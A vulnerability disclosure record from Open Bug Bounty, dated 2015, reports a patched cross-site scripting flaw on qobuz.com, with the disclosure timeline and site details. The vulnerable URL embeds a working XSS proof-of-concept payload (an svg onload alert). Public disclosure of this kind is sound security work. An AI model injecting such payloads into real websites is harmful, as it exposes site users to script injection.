qobuz.com XSS vulnerability

2015-09-19T20:27:00
ID OBB:87383
Type openbugbounty
Reporter BesafeCybersecurity
Modified 2015-09-19T20:30:00

Description

Vulnerable URL:
http://www.qobuz.com/ch-fr/search?q=svg+o%27lord+alert+xposed&rf;=%3Csvg+onload%3Dalert%28%27XSSPOSED%27%29%3E&i;=boutique
Details:

Description| Value
---|---
Patched:| Yes, at 17.10.2015
Latest check for patch:| 17.10.2015 01:41 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 26400
Google Pagerank| 6
VIP website status:| Yes
Check qobuz.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 19 September, 2015 20:27 GMT
Vulnerability existence verified and confirmed| 19 September, 2015 20:30 GMT